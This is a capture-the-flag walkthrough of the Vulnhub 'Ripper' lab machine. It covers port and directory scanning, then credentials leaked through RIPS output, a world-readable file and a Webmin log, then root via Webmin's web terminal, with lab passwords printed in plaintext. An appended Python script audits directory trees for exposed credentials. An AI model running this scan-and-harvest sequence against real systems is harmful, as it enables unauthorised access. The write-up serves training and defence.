Ripper
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.173.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:81:10:a5 2 120 PCS Systemtechnik GmbH
192.168.56.224 08:00:27:72:76:55 2 120 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.224.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.224 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 20:34 EST
Nmap scan report for bogon (192.168.56.224)
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:1a:06:6e:ed:a0:9b:6f:d7:c7:78:83:3a:f7:7a:9c (RSA)
| 256 99:f1:83:7c:15:b9:db:a7:a8:56:96:05:ae:5d:d3:ee (ECDSA)
|_ 256 f4:8c:5a:90:99:ea:d6:24:ba:5a:2d:13:e9:ce:68:0c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:72:76:55 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.94 seconds
The Nmap results show that the target host has three open ports: 22 (SSH), 80 (HTTP) and 10000 (HTTP).
Getting a shell
Browsing to port 80 returns the Apache2 default page, and a check for robots.txt shows it does not exist. Next, a directory scan:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 20:41:33 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220336 / 220561 (99.90%)===============================================================
2022/12/15 20:41:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ nikto -h http://192.168.56.224
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.224
+ Target Hostname: 192.168.56.224
+ Target Port: 80
+ Start Time: 2022-12-15 22:29:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c3f2156d5d01, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-15 22:30:03 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ dirb http://192.168.56.224
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 15 22:30:55 2022
URL_BASE: http://192.168.56.224/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.224/ ----
+ http://192.168.56.224/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.224/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Thu Dec 15 22:30:57 2022
DOWNLOADED: 4612 - FOUND: 2
Neither gobuster, nikto nor dirb turned up any new directories, so let's have gobuster scan for files as well:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ gobuster dir -u http://192.168.56.224 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.224
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,sh,html
[+] Timeout: 10s
===============================================================
2022/12/15 22:32:22 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10918]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101024 / 1102805 (99.84%)===============================================================
2022/12/15 22:34:56 Finished
===============================================================
gobuster did not find any files either, so next let's look at port 10000.
Visiting port 10000 returns a page saying the server redirects to HTTPS, and it names a hostname, so first add a hosts entry:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.224 ripper-min
Visiting the URL:
https://ripper-min:10000/
returns a user login page.
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ curl -k https://ripper-min:10000/robots.txt
User-agent: *
Disallow: /
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ echo 'd2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==' | base64 -d
we scan php codes with rips
On the RIPS website, the download and installation section shows that after installation its path is /rips/. Trying this directory on ports 80 and 10000 shows that RIPS is served on port 80.
The RIPS page can scan the files under /var/www for vulnerabilities; the result reports 4 vulnerable files (information disclosure).
One of them, ./html/rips/secret.php, contains a username and password:
username: ripper
password: Gamespeopleplay
Logging in to port 10000 with these credentials fails, so perhaps they are the SSH credentials:
┌──(kali㉿kali)-[~/Vulnhub/ripper]
└─$ ssh ripper@192.168.56.224
The authenticity of host '192.168.56.224 (192.168.56.224)' can't be established.
ED25519 key fingerprint is SHA256:Gz/RqLZwvom5GaG8tBiFtAT9fnNDcbSol7p6Fnfe0G0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.224' (ED25519) to the list of known hosts.
ripper@192.168.56.224's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
276 packages can be updated.
211 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Jun 4 13:26:34 2021 from 10.0.0.154
ripper@ripper-min:~$ id
uid=1000(ripper) gid=1000(ripper) groups=1000(ripper),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ripper@ripper-min:~$
ripper@ripper-min:~$ cat flag.txt
__________.____________________________________________
\______ \ \______ \______ \_ _____/\______ \
| _/ || ___/| ___/| __)_ | _/
| | \ || | | | | \ | | \
|____|_ /___||____| |____| /_______ / |____|_ /
\/ \/ \/
flag{15ea80f080be3714df1ef97bac5d7151}
C0ngratulation on getting user ! Lets get root now :)
ripper@ripper-min:~$
Privilege escalation
The author hints that you need to obtain a shell as every user before escalating to root.
ripper@ripper-min:/tmp$ cd /home
ripper@ripper-min:/home$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Jun 4 2021 .
drwxr-xr-x 24 root root 4.0K Jun 4 2021 ..
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 cubes
drwxr-xr-x 16 ripper ripper 4.0K Jun 4 2021 ripper
ripper@ripper-min:/home$
In other words, the next step is to get a shell as cubes.
ripper@ripper-min:/home$ cd cubes/
ripper@ripper-min:/home/cubes$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 .
drwxr-xr-x 4 root root 4.0K Jun 4 2021 ..
-rw------- 1 cubes cubes 384 Jun 4 2021 .bash_history
-rw-r--r-- 1 cubes cubes 220 Jun 4 2021 .bash_logout
-rw-r--r-- 1 cubes cubes 3.7K Jun 4 2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun 4 2021 .cache
drwx------ 11 cubes cubes 4.0K Jun 4 2021 .config
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Desktop
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Documents
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Downloads
-rw-r--r-- 1 cubes cubes 8.8K Jun 4 2021 examples.desktop
drwx------ 3 cubes cubes 4.0K Jun 4 2021 .gnupg
-rw------- 1 cubes cubes 334 Jun 4 2021 .ICEauthority
drwxrwxr-x 3 cubes cubes 4.0K Jun 4 2021 .local
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Music
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Pictures
-rw-r--r-- 1 cubes cubes 807 Jun 4 2021 .profile
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Public
drwx------ 2 cubes cubes 4.0K Jun 4 2021 .ssh
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Templates
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Videos
ripper@ripper-min:/home/cubes$ cd .ssh
-bash: cd: .ssh: Permission denied
ripper@ripper-min:/home/cubes$ cat .bash_history
cat: .bash_history: Permission denied
We have no permission to read the contents of cubes's home directory, so use find to locate files owned by the cubes user:
ripper@ripper-min:/home/cubes$ find / -user cubes -type f 2>/dev/null
/home/cubes/.profile
/home/cubes/.bashrc
/home/cubes/.ICEauthority
/home/cubes/examples.desktop
/home/cubes/.bash_logout
/home/cubes/.bash_history
/mnt/secret.file
ripper@ripper-min:/home/cubes$ ls -alh /mnt/secret.file
-rw-rw-r-- 1 cubes cubes 60 Jun 4 2021 /mnt/secret.file
ripper@ripper-min:/home/cubes$ cat /mnt/secret.file
This is my secret file
[file system]
-passwd : Il00tpeople
ripper@ripper-min:/home/cubes$
ripper@ripper-min:/home/cubes$ su - cubes
Password:
cubes@ripper-min:~$ id
uid=1001(cubes) gid=1001(cubes) groups=1001(cubes)
cubes@ripper-min:~$ sudo -l
[sudo] password for cubes:
Sorry, user cubes may not run sudo on ripper-min.
cubes@ripper-min:~$ cd /home/cubes/
cubes@ripper-min:~$ ls -alh
total 92K
drwxr-xr-x 15 cubes cubes 4.0K Jun 4 2021 .
drwxr-xr-x 4 root root 4.0K Jun 4 2021 ..
-rw------- 1 cubes cubes 384 Jun 4 2021 .bash_history
-rw-r--r-- 1 cubes cubes 220 Jun 4 2021 .bash_logout
-rw-r--r-- 1 cubes cubes 3.7K Jun 4 2021 .bashrc
drwx------ 10 cubes cubes 4.0K Jun 4 2021 .cache
drwx------ 11 cubes cubes 4.0K Jun 4 2021 .config
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Desktop
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Documents
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Downloads
-rw-r--r-- 1 cubes cubes 8.8K Jun 4 2021 examples.desktop
drwx------ 3 cubes cubes 4.0K Jun 4 2021 .gnupg
-rw------- 1 cubes cubes 334 Jun 4 2021 .ICEauthority
drwxrwxr-x 3 cubes cubes 4.0K Jun 4 2021 .local
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Music
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Pictures
-rw-r--r-- 1 cubes cubes 807 Jun 4 2021 .profile
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Public
drwx------ 2 cubes cubes 4.0K Jun 4 2021 .ssh
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Templates
drwxr-xr-x 2 cubes cubes 4.0K Jun 4 2021 Videos
cubes@ripper-min:~$
cubes@ripper-min:~$ cat .bash_history
cd /var/
ls
cd webmin/
ks
ls
cd backup/
ls
cd /mnt/
ls -la
nano s.txt
ls
rm s.txt
nano secret.file
su ripper
sudo apt
su root
cd /var/
ls
cd webmin/
ls
mkdir backup
cd backup/
cd ..
ls
cat miniserv.
cat miniserv.log
cd modules/
ls
cd ..
ls
cat miniserv.error
ls
cat blocked
cp miniserv.error backup/miniser.log
cd backup/
ls
nano miniser.log
cd /mnt/
ls
nano secret.file
su root
cubes@ripper-min:~$
Let's take a look in the /var/webmin directory:
cubes@ripper-min:/var/webmin$ cd backup
cubes@ripper-min:/var/webmin/backup$ ls -alh
total 12K
drwxrwxr-x+ 2 cubes cubes 4.0K Jun 4 2021 .
drwxrwx---+ 4 root bin 4.0K Jun 4 2021 ..
-rw-rwx---+ 1 cubes cubes 2.6K Jun 4 2021 miniser.log
cubes@ripper-min:/var/webmin/backup$ cat miniser.log
[04/Jun/2021:11:21:48 -0400] miniserv.pl started
[04/Jun/2021:11:21:48 -0400] IPv6 support enabled
[04/Jun/2021:11:21:48 -0400] Using MD5 module Digest::MD5
[04/Jun/2021:11:21:48 -0400] Using SHA512 module Crypt::SHA
[04/Jun/2021:11:21:48 -0400] Perl module Authen::PAM needed for PAM is not installed : Can't locate Authen/PAM.pm in @INC (you may need to install the Authen::PAM module) (@INC contains: /root/webmin-1.910 /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.26.1 /usr/local/share/perl/5.26.1 /usr/lib/x86_64-linux-gnu/perl5/5.26 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.26 /usr/share/perl/5.26 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at (eval 15) line 1.
BEGIN failed--compilation aborted at (eval 15) line 1.
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : session_login.cgi=username=admin&pass=tokiohotel
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Document follows : This web server is running in SSL mode. Try the URL <a href='https://ripper-min:10000/'>https://ripper-min:10000/</a> instead.<br>
[04/Jun/2021:11:33:29 -0400] Reloading configuration
[04/Jun/2021:11:33:39 -0400] Reloading configuration
Use of uninitialized value in numeric ne (!=) at /root/webmin-1.910/bind8/bind8-lib.pl line 2397.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value $ip in concatenation (.) or string at /root/webmin-1.910/system-status/system_info.pl line 39.
Use of uninitialized value $mode in chop at /root/webmin-1.910/webmin/webmin-lib.pl line 1762.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
Use of uninitialized value in string eq at /root/webmin-1.910/webmin/webmin-lib.pl line 656.
cubes@ripper-min:/var/webmin/backup$
miniser.log contains a username and password, probably for Webmin:
Logging in to the admin panel succeeds, and it has a web terminal feature, which gives the root flag directly.
[admin@ripper-min ~]# id
uid=0(root) gid=0(root) groups=0(root)
[admin@ripper-min root]# ls -alh
total 30M
drwx------ 7 root root 4.0K Jun 4 2021 .
drwxr-xr-x 24 root root 4.0K Jun 4 2021 ..
-rw------- 1 root root 1.5K Jun 4 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Aug 6 2020 .cache
drwx------ 3 root root 4.0K Dec 15 23:41 .gnupg
drwxr-xr-x 3 root root 4.0K Jun 4 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 170 Jun 4 2021 .wget-hsts
-rw-r--r-- 1 root root 252 Jun 4 2021 flag.txt
drwxr-xr-x 6 root root 4.0K Jun 4 2021 snap
drwxr-xr-x 132 root bin 12K Jun 4 2021 webmin-1.910
-rw-r--r-- 1 root root 30M May 9 2019 webmin.tar.gz
[admin@ripper-min root]# cat flag.txt
.---..-.-.-..-..-..--. .---. .-..---..---..---..---.
| |-'| | | || .` || \ \### | |-< | || |-'| |-'| |- | |-<
`-' `-----'`-'`-'`-'-' `-'`-'`-'`-' `-' `---'`-'`-'
COngrats !!! You have rooted this box !!
Follow me on twitter @san3ncrypt3d
[admin@ripper-min root]#
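Both footholds on this box came from plaintext secrets sitting where another user could read them: /mnt/secret.file was mode -rw-rw-r-- with the cubes password in it, and a copy of the Webmin miniserv log in /var/webmin/backup still carried the `session_login.cgi=username=admin&pass=...` line. The following Python script is an added example, not part of the original write-up or of Webmin or RIPS: it walks a directory tree, rates each regular file by who else can read it from its mode bits, and reports credential-looking lines with the secret redacted. The two sample files it builds in a temporary directory are constructed to mirror the box; the regexes and severity labels are this example's own assumptions.

```python
"""Audit a directory tree for plaintext credentials and who can read them.

Added example (not from the original write-up). The regexes and severity
labels are this script's own choices; the sample files are constructed.
"""
import os
import re
import stat
import tempfile

# Order matters: the Webmin login-log form is tried first so that the generic
# key/value pattern does not report its "pass=" field a second time.
WEBMIN_LOGIN = re.compile(r"username=([^&\s]+)&pass=([^&\s]+)")
GENERIC_KV = re.compile(r"\b(passw(?:or)?d|pass|pwd)\s*[:=]\s*(\S+)", re.IGNORECASE)


def exposure(mode):
    """Classify who besides the owner can read a file from its st_mode bits."""
    if mode & stat.S_IROTH:
        return "high"      # any local user can read it (as with /mnt/secret.file)
    if mode & stat.S_IRGRP:
        return "medium"    # readable by the owning group
    return "low"           # owner-only, but still a plaintext secret at rest


def find_credentials(text):
    """Return (line_no, username_or_None, redacted_line) for each credential-looking line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = WEBMIN_LOGIN.search(line)
        if m:
            hits.append((n, m.group(1), line.replace(m.group(2), "***")))
            continue
        m = GENERIC_KV.search(line)
        if m:
            hits.append((n, None, line.replace(m.group(2), "***")))
    return hits


def audit_tree(root):
    """Walk root and report credential lines together with each file's exposure."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue          # skip symlinks, sockets, devices
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue          # unreadable to the auditing user
            for line_no, user, redacted in find_credentials(text):
                findings.append({
                    "path": os.path.relpath(path, root),
                    "line": line_no,
                    "user": user,
                    "severity": exposure(st.st_mode),
                    "evidence": redacted,
                })
    return findings


def build_demo_tree():
    """Constructed sample tree mirroring the box's two leaks; returns its path."""
    root = tempfile.mkdtemp(prefix="ripper-audit-")
    os.makedirs(os.path.join(root, "mnt"))
    os.makedirs(os.path.join(root, "var", "webmin", "backup"))
    secret = os.path.join(root, "mnt", "secret.file")
    with open(secret, "w") as fh:
        fh.write("This is my secret file\n[file system]\n-passwd : Il00tpeople\n")
    os.chmod(secret, 0o664)   # -rw-rw-r--, as listed on the box
    log = os.path.join(root, "var", "webmin", "backup", "miniser.log")
    with open(log, "w") as fh:
        fh.write("[04/Jun/2021:11:21:48 -0400] miniserv.pl started\n"
                 "[04/Jun/2021:11:33:16 -0400] [10.0.0.154] Authentication : "
                 "session_login.cgi=username=admin&pass=tokiohotel\n")
    os.chmod(log, 0o670)      # -rw-rwx---; the box's ACL ("+") is not reproduced
    return root


if __name__ == "__main__":
    for f in audit_tree(build_demo_tree()):
        print(f"{f['severity']:6} {f['path']}:{f['line']} user={f['user']} {f['evidence']}")
```

Run it as the auditing user against / (or any tree) instead of the demo directory to reproduce the same sweep the attacker did with `find / -user cubes`, but from the defender's side: anything rated high is readable by every local account and should be moved, chmod'ed, or deleted, and a medium hit in a log copy is the cue to strip authentication lines before logs are archived outside /root.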
From: https://www.cnblogs.com/jason-huawen/p/16987089.html